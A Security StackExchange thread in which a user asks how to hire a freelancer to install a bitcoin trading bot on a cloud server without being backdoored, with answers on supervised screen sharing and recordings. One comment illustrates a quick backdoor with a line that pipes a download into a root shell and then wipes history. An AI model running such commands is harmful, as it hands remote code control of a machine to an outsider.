4

Context

I tried installing Tribeca (a bitcoin trading bot) myself yesterday, but messed it up somehow, as I'm not very familiar with Docker/Git/NPM/mongoDB technologies (a little knowledge is dangerous &c, &c).

I'd like to pay someone on Upwork to install it to a cloud server for me (I'm thinking Digital Ocean), but I was worried about the possibility of the freelancer being able to access my details/funds after the install and handover were completed.

Question

Is there any way to verify that the install of Tribeca is safe to use without my funds getting stolen and that the freelancer is unable to access it?

Here's what I thought of so far:

  • To verify that the code is the same, getting the checksum of the installed code and the checksum of the Github repository, and comparing them. I'm not sure if this would work if changes occurred to the files during installation
  • Entering my exchange API keys myself, after I'm satisfied that the freelancer doesn't have access/backdoors built in (this one is obvious).

Is it even possible to verify that the install isn't malicious, or am I going about this all wrong?

I'm a long-time Sec.SE lurker, but this is the first time I've posted a question. Please comment on how I can improve the question so it's more answerable - thanks :)

Community
  • 1
user29357
  • 41
  • 5
  • Checking for backdoor is not necessarily obvious. How do you plan to check for it ? If someone has access at anytime your server with root access, you can consider it compromised. The only solution is to fully reinstall your server. – Xavier59 Mar 15 '18 at 11:03
  • @Xavier59 - so is there no way to verify that the install is safe, if they install it? – user29357 Mar 15 '18 at 22:02

3 Answers3

1

If you give them unattended access for any amount of time, you can't.

What you can do is for example to give them access to your desktop using some remote desktop software, then connect to the cloud server from your PC. If you watch them all the time, you can be sure there is no backdoor, if you understand everything they do.

Most likely you won't understand everything they do, else you'd just do it yourself. But at least you would notice maybe suspicious actions.

Many screen sharing tools also allow to record the screen. This way you could show the recording to someone else to check that no backdoor was installed.

The important point is that you never allow them to access the server on their own and watch everything they do.

Josef
  • 5,903
  • 25
  • 33
  • If I have a root access on your machine and have to install a bunch of software it will be very easy for me, to also install a backdoor in the process. This will probably be one step in a thousand steps, and if you as a user have no knowledge at all about software and malware, you will have no idea what I did. On the other hand, a trained professional *might* catch it. But paying that person, will be pretty expensive, because she has to watch a 5 hour video of me installing software. – Tom K. Mar 16 '18 at 09:47
  • @TomK. Well, paying one person to install software for 5h and paying another one (or better two) persons to watch this 5h installation would probably double (or triple) the cost. Still not unreasonable. – Josef Mar 16 '18 at 10:12
  • With a well prepared attacker, getting a backdoor installed can be pretty swift. A command like `curl blah.co | sudo sh` can be pasted and run in a blink, and if the script clears the terminal history afterwards, there's no way for you to know that it happened. – Lie Ryan Mar 16 '18 at 11:23
  • Directly piping a downloaded file to a shell would be something that I'd call suspicious... – Lukas Mar 16 '18 at 12:28
  • Hmm, good answer. I was thinking of getting them to register a cloud server then turn it over to me afterward, but obviously the same concerns would still apply. On another note - would a highly-rated user's fear of a low rating be great enough to prevent them doing a bad/malicious job? – user29357 Mar 16 '18 at 21:42
  • @user29357 A highly-rated person will be less likely to do something malicious, because that means they care about their reputation. Of course, it is still far less safe than having a professional who's *job* it is to do this. – forest Mar 17 '18 at 00:52
  • 1
    @user29357 would stealing all your bitcoins be worth more to that person than the negative rating you could give them? (Keep in mind a highly rated person most likely has many ratings already so your single feedback won't influence that much). Also if I where that person I'd steal your bitcoins maybe half a year later. Impossible to prove that it was the person initially installing your bot. – Josef Mar 19 '18 at 11:48
  • @Josef, stealing my bitcoins would be worth very little :D Good point though - I could go through the exercise solely to gain the screencast of the install, then follow the steps myself to replicate it. Hey that's a good idea! I'll post it as an answer. – user29357 Mar 19 '18 at 19:45
1

You could task someone to create very exact and simple instructions for setting up the bot (take this bash .sh file I wrote, edit your API key into it, start a DigitalOcean server with the Ubuntu 16.04 image, scp the .sh file onto the server, and run it), and then you follow the instructions yourself.

The only issue is that they'll need a DigitalOcean account and maybe an exchange account to test things out. You could reimburse them for using their own accounts, or maybe give them limited access to your accounts. (Maybe you could create a DigitalOcean team, add them to the team so they can create a server, and after they're done you remove them from the team and remove any leftover servers. Maybe you can give them a read-only API key to your exchange account that doesn't have permission to do trades, and you revoke the API key they're done testing things.)

Macil
  • 1,482
  • 9
  • 11
  • It's not always that easy to automate the installation of a complex framework. You would need to write a very well tested and rugged shell script, not just stick together a couple of lines of `ed`, `mv`, and `apt`. – forest Mar 17 '18 at 01:46
  • I'm not technical enough to even install it, so I can't do the exact simple instructions :( +1 though, I like the DigitalOcean team idea. – user29357 Mar 17 '18 at 02:46
0

Follow through on posting the job ad to Upwork, and place special emphasis on the screencast.

Once you have the screencast, replicate it with another install on a cloud server that no one else has touched.

If there's anything suspicious in the screencast (eg changing code), ask someone else about it (maybe on Sec.SE) before going through with it.

In essence, you are paying someone to create a set of detailed instructions (via video) for installing it, with the install being handled by yourself.

This is an answer to my own question, provoked by one of the comments to another answer.

user29357
  • 41
  • 5